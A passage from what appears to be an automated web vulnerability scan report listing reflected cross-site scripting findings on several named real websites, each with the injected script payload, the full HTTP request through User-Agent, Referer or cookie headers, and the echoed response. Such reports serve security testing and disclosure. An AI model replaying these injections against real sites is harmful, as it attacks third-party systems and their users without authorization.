Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /gdshop/registrar/search.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)7e581<script>alert(1)</script>c42c55d61fb
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 16678
Content-Type: text/html
Expires: Sun, 10 Apr 2011 15:38:15 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Mon, 16-Apr-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: traffic=referringdomain=&referringpath=&shopper=&querystring=msvar%3Dtrue&server=M1PWCORPWEB186&isc=&privatelabelid=1&page=%2Fgdshop%2Fbrowser%5Fupdate%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Sun, 24-Apr-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDAUARSRCQ=CMPPJFHBGBKPLPGCALJOOMCC; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sun, 17 Apr 2011 14:18:15 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Browser Update Page</title>
<meta http-equiv="Content-T
...[SNIP]...
</B>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)7e581<script>alert(1)</script>c42c55d61fb</b>
...[SNIP]...

4.287. http://www.haber.gen.tr/edit [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /edit

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e26e"><script>alert(1)</script>1b575ac794 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /edit HTTP/1.1
Host: www.haber.gen.tr
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=4e26e"><script>alert(1)</script>1b575ac794

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 13:52:24 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=cfde59bd39590f4a9597ae2d4ea87408; path=/; domain=.haber.gen.tr
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 22947


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="http://www.google.com/search?hl=en&q=4e26e"><script>alert(1)</script>1b575ac794" type="hidden" />
...[SNIP]...

4.288. http://www.hollerclassic.com/index.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.hollerclassic.com
Path:   /index.htm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93436"><script>alert(1)</script>764517e4f23 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /index.htm HTTP/1.1
Host: www.hollerclassic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=93436"><script>alert(1)</script>764517e4f23

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse,CookieSet
Date: Sun, 17 Apr 2011 14:19:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ssoid=63d4bcb70a0a002f017f2dac6e2cf94b;path=/
Set-Cookie: JSESSIONID=pr05wamio9av;path=/
Set-Cookie: ddcpoolid=CmsPoolP;path=/;
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 54476

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7072 -->

   <title> | New Audi, Chevrolet, Honda, Hummer, Hyundai, Mazda dealership in Winter Park, FL 32789
...[SNIP]...
<img src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=http://www.google.com/search?hl=en&q=93436"><script>alert(1)</script>764517e4f23&amp;20=www.hollerclassic.com&amp;21=/index.htm&amp;50=63d4bcb70a0a002f017f2dac6e2cf94b&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;8
...[SNIP]...

4.289. http://www.hollerclassic.com/index.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.hollerclassic.com
Path:   /index.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18a7b'-alert(1)-'9a5e8f0fc61 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /index.htm HTTP/1.1
Host: www.hollerclassic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=18a7b'-alert(1)-'9a5e8f0fc61

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse,CookieSet
Date: Sun, 17 Apr 2011 14:19:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ssoid=63d4c1830a0a002f017f2dacf05de77c;path=/
Set-Cookie: JSESSIONID=1cb1jpmleu3fv;path=/
Set-Cookie: ddcpoolid=CmsPoolP;path=/;
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 54446

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7072 -->

   <title> | New Audi, Chevrolet, Honda, Hummer, Hyundai, Mazda dealership in Winter Park, FL 32789
...[SNIP]...
tact: '',
               portal: '',
               sem: '',
               rlCookie: '',
               region: '',
               keyword: '',
               locality: 'en_US',
               host: '173.193.214.243',
               sessionReferrer: 'http://www.google.com/search?hl=en&q=18a7b'-alert(1)-'9a5e8f0fc61',
               tcdkwid: '',
               tcdcmpid: '',
               tcdadid: '',
refId: '',
               platform: '',
               version: '',
               skin: '',
               templateExtra: '',
                       type: 10,
           extra: 'INDEX'
       };
               D
...[SNIP]...

4.290. http://www.theautomastermercedesbenz.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e682'-alert(1)-'ef04afa0abc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=6e682'-alert(1)-'ef04afa0abc
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse,CookieSet
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:35:10 GMT
Connection: close
Set-Cookie: ssoid=6118db350a0a002f005f07e8b6cd8671;path=/
Set-Cookie: JSESSIONID=4tpik3cqg96gk;path=/
Set-Cookie: ddcpoolid=CmsPoolO;path=/;
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 86751

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Mercedes Benz | New Mercedes dealership in Shelburne, VT 05482</title>
   <meta http-equiv=
...[SNIP]...
tact: '',
               portal: '',
               sem: '',
               rlCookie: '',
               region: '',
               keyword: '',
               locality: 'en_US',
               host: '173.193.214.243',
               sessionReferrer: 'http://www.google.com/search?hl=en&q=6e682'-alert(1)-'ef04afa0abc',
               tcdkwid: '',
               tcdcmpid: '',
               tcdadid: '',
refId: '',
               platform: '',
               version: '',
               skin: '',
               templateExtra: '',
                       type: 10,
           extra: 'INDEX'
       };
               D
...[SNIP]...

4.291. http://www.theautomastermercedesbenz.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5690f"><script>alert(1)</script>bc22e994a68 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=5690f"><script>alert(1)</script>bc22e994a68
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse,CookieSet
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:35:04 GMT
Connection: close
Set-Cookie: ssoid=6118c4780a0a002f005f07e8de15bd02;path=/
Set-Cookie: JSESSIONID=25aep0xbvapjr;path=/
Set-Cookie: ddcpoolid=CmsPoolO;path=/;
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 86781

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Mercedes Benz | New Mercedes dealership in Shelburne, VT 05482</title>
   <meta http-equiv=
...[SNIP]...
<img src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=http://www.google.com/search?hl=en&q=5690f"><script>alert(1)</script>bc22e994a68&amp;20=www.theautomastermercedesbenz.com&amp;21=/index.htm&amp;50=6118c4780a0a002f005f07e8de15bd02&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&a
...[SNIP]...

4.292. http://www.theautomastermercedesbenz.com/index.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /index.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5fa27'-alert(1)-'bad3f5b4489 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /index.htm HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=5fa27'-alert(1)-'bad3f5b4489
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse,CookieSet
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:03:51 GMT
Connection: close
Set-Cookie: ssoid=5f44bbc10a0a002f005f07e84766f648;path=/
Set-Cookie: JSESSIONID=51er345s2l9rv;path=/
Set-Cookie: ddcpoolid=CmsPoolO;path=/;
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 86751

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Mercedes Benz | New Mercedes dealership in Shelburne, VT 05482</title>
   <meta http-equiv=
...[SNIP]...
tact: '',
               portal: '',
               sem: '',
               rlCookie: '',
               region: '',
               keyword: '',
               locality: 'en_US',
               host: '173.193.214.243',
               sessionReferrer: 'http://www.google.com/search?hl=en&q=5fa27'-alert(1)-'bad3f5b4489',
               tcdkwid: '',
               tcdcmpid: '',
               tcdadid: '',
refId: '',
               platform: '',
               version: '',
               skin: '',
               templateExtra: '',
                       type: 10,
           extra: 'INDEX'
       };
               D
...[SNIP]...

4.293. http://www.theautomastermercedesbenz.com/index.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.theautomastermercedesbenz.com
Path:   /index.htm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 820c4"><script>alert(1)</script>48f2540543a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /index.htm HTTP/1.1
Host: www.theautomastermercedesbenz.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=820c4"><script>alert(1)</script>48f2540543a
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse,CookieSet
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:03:47 GMT
Connection: close
Set-Cookie: ssoid=5f44ada50a0a002f005f07e8f4120276;path=/
Set-Cookie: JSESSIONID=9a34h8dp52u7n;path=/
Set-Cookie: ddcpoolid=CmsPoolO;path=/;
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 86781

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7071 -->

   <title>Mercedes Benz | New Mercedes dealership in Shelburne, VT 05482</title>
   <meta http-equiv=
...[SNIP]...
<img src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=http://www.google.com/search?hl=en&q=820c4"><script>alert(1)</script>48f2540543a&amp;20=www.theautomastermercedesbenz.com&amp;21=/index.htm&amp;50=5f44ada50a0a002f005f07e8f4120276&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&a
...[SNIP]...

4.294. http://shop.ca.com/applications/email/d_subscribe.asp [Cart cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /applications/email/d_subscribe.asp

Issue detail

The value of the Cart cookie is copied into an HTML comment. The payload 5521d--><script>alert(1)</script>dc59d49c34 was submitted in the Cart cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /applications/email/d_subscribe.asp HTTP/1.1
Host: shop.ca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SessionId=1310349220110417085445173193214243; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Order=orderTotal=; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=93; Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp5521d--><script>alert(1)</script>dc59d49c34; CoreID6=81872050743513030451330&ci=; beta=Y; SRCCODE=CAWEB; SRVR=WEBX140%2D01C; IS3_History=1301114230-2-91_0--2__0_0; IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.3.10.1303044886; _clogin=l=1303045133&v=7&e=1303046939452;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Content-Length: 9504
Content-Type: text/html
Cache-Control: private
Date: Sun, 17 Apr 2011 13:04:46 GMT
Connection: close
Set-Cookie: SRVR=WEBX140%2D01C; path=/
Set-Cookie: DB=msRandX=93&msProduct=1782427&Sidenav=B&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&Survey=1&msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/


<html>
<head>

<TITLE>shop.ca.com - Invalid Email</TITLE>
<meta name="Author" content="TigerDirect, Inc. Web Development Team">
<meta name="copyright" content=". 2003 TigerDirect, Inc. All righ
...[SNIP]...
<!--Cart(Landing) :http://shop.ca.com/ca/resources/resources.asp5521d--><script>alert(1)</script>dc59d49c34-->
...[SNIP]...

4.295. http://shop.ca.com/applications/email/d_subscribe.asp [CoreID6 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /applications/email/d_subscribe.asp

Issue detail

The value of the CoreID6 cookie is copied into an HTML comment. The payload b2cdc--><script>alert(1)</script>82614f1262c was submitted in the CoreID6 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /applications/email/d_subscribe.asp HTTP/1.1
Host: shop.ca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SessionId=1310349220110417085445173193214243; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Order=orderTotal=; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=93; Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; CoreID6=81872050743513030451330&ci=b2cdc--><script>alert(1)</script>82614f1262c; beta=Y; SRCCODE=CAWEB; SRVR=WEBX140%2D01C; IS3_History=1301114230-2-91_0--2__0_0; IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.3.10.1303044886; _clogin=l=1303045133&v=7&e=1303046939452;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
Date: Sun, 17 Apr 2011 13:04:46 GMT
Content-Length: 9505
Connection: close
Set-Cookie: SRVR=WEBX140%2D01C; path=/
Set-Cookie: DB=msRandX=93&msProduct=1782427&Sidenav=A&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&Survey=1&msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/


<html>
<head>

<TITLE>shop.ca.com - Invalid Email</TITLE>
<meta name="Author" content="TigerDirect, Inc. Web Development Team">
<meta name="copyright" content=". 2003 TigerDirect, Inc. All righ
...[SNIP]...
<!--CoreID6(818720507435:b2cdc--><script>alert(1)</script>82614f1262c-->
...[SNIP]...

4.296. http://shop.ca.com/applications/email/d_subscribe.asp [DB cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /applications/email/d_subscribe.asp

Issue detail

The value of the DB cookie is copied into an HTML comment. The payload e77e5--><script>alert(1)</script>0f2b82797b3 was submitted in the DB cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /applications/email/d_subscribe.asp HTTP/1.1
Host: shop.ca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SessionId=1310349220110417085445173193214243; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Order=orderTotal=; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=93e77e5--><script>alert(1)</script>0f2b82797b3; Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; CoreID6=81872050743513030451330&ci=; beta=Y; SRCCODE=CAWEB; SRVR=WEBX140%2D01C; IS3_History=1301114230-2-91_0--2__0_0; IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.3.10.1303044886; _clogin=l=1303045133&v=7&e=1303046939452;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
Date: Sun, 17 Apr 2011 13:04:45 GMT
Content-Length: 9505
Connection: close
Set-Cookie: SRVR=WEBX140%2D01C; path=/
Set-Cookie: DB=msRandX=93e77e5%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E0f2b82797b3&msProduct=1782427&Sidenav=A&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&Survey=1&msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/


<html>
<head>

<TITLE>shop.ca.com - Invalid Email</TITLE>
<meta name="Author" content="TigerDirect, Inc. Web Development Team">
<meta name="copyright" content=". 2003 TigerDirect, Inc. All righ
...[SNIP]...
<!--DB(msRandX) :93e77e5--><script>alert(1)</script>0f2b82797b3-->
